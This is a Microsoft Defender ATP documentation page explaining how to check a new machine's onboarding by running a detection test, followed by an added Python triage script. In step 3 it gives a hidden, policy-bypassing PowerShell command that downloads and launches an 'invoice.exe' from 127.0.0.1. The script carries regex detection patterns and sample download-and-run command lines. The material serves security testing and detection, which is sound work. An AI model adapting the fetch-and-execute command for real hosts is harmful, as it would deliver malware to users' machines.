Nick Schonning 4cc0773fe8 fix: MD019/no-multiple-space-atx
Multiple spaces after hash on atx style heading
2019-08-10 17:07:41 -04:00


title: Run a detection test on a newly onboarded Microsoft Defender ATP machine
description: Run the detection script on a newly onboarded machine to verify that it is properly onboarded to the Microsoft Defender ATP service.
keywords: detection test, detection, powershell, script, verify, onboarding, windows defender advanced threat protection onboarding, clients, servers, test
search.product: eADQiWindows 10XVcnh
search.appverid: met150
ms.prod: w10
ms.mktglfcycl: deploy
ms.sitesec: library
ms.pagetype: security
ms.author: macapara
author: mjcaparas
ms.localizationpriority: medium
manager: dansimp
audience: ITPro
ms.collection: M365-security-compliance
ms.topic: article

Run a detection test on a newly onboarded Microsoft Defender ATP machine

Applies to:

Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Microsoft Defender ATP service.

  1. Create a folder: 'C:\test-WDATP-test'.

  2. Open an elevated command-line prompt on the machine and run the script:

    a. Go to Start and type cmd.

    b. Right-click Command Prompt and select Run as administrator.


  3. At the prompt, copy and run the following command:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
    

The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes.
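The alert this test raises looks like a real download-and-execute event, so analysts need a quick way to tell the two apart in process-creation logs. The following triage helper is an added example, not part of the original page and not Microsoft Defender ATP's detection logic; the trait names, the `classify` function and the sample command lines other than the page's own command are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Generic traits visible in the test command line (assumed heuristics, not Defender ATP rules).
TRAITS = {
    "policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "web_download": re.compile(r"Net\.WebClient\)\.DownloadFile\(", re.I),
    "runs_payload": re.compile(r"Start-Process", re.I),
}
URL_RE = re.compile(r"DownloadFile\('([^']+)'", re.I)
TEST_DIR = r"c:\test-wdatp-test"  # folder created in step 1 of the procedure

# Sample process-creation command lines: [0] is the page's command, [1] and [2] are constructed.
SAMPLES = [
    r"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'",
    r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://files.example.test/a.exe', 'C:\Users\Public\a.exe');Start-Process 'C:\Users\Public\a.exe'",
    r"powershell.exe -NoProfile -Command Get-Service",
]


def is_loopback(url):
    host = urlparse(url).hostname or ""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # hostname rather than an IP literal
        return host.lower() == "localhost"


def classify(cmdline):
    """Return (label, matched_traits) for one process-creation command line."""
    traits = sorted(name for name, rx in TRAITS.items() if rx.search(cmdline))
    if len(traits) < len(TRAITS):
        return "not-matched", traits
    m = URL_RE.search(cmdline)
    in_test_dir = TEST_DIR in cmdline.lower().replace("\\\\", "\\")
    if m and is_loopback(m.group(1)) and in_test_dir:
        return "onboarding-test", traits  # loopback source plus the test folder
    return "investigate", traits


if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line)[0], "<-", line[:60])
```

The test command is only labelled `onboarding-test` because its download source is the loopback address and its target is the test folder; the same traits with any other source are left for investigation.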